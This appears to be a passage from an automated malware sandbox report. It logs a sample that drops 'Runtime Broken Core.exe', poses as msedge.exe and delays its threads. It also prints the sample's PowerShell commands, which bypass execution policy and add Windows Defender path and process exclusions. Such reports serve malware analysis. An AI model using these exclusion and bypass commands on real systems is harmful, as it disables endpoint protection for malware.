Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1A770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Memory allocated: 1200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Memory allocated: 1AEF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Memory allocated: AE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Memory allocated: 1A850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Memory allocated: E10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Memory allocated: 1A850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Memory allocated: 10A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Memory allocated: 1AAB0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4748	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5084	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6925	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2515	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 6300	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe TID: 1792	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe TID: 7188	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe TID: 7516	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe TID: 1516	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Thread delayed: delay time: 922337203685477

Source: msedge.exe, 00000012.00000002.2571506623.000000001BA81000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe'
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe'			Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe'

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe'			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Queries volume information: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Queries volume information: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Queries volume information: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe	Queries volume information: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe VolumeInformation

Source: msedge.exe, 00000012.00000002.2571506623.000000001BA81000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000012.00000002.2548369361.0000000001308000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000012.00000002.2571506623.000000001BB29000.00000004.00000020.00020000.00000000.sdmp

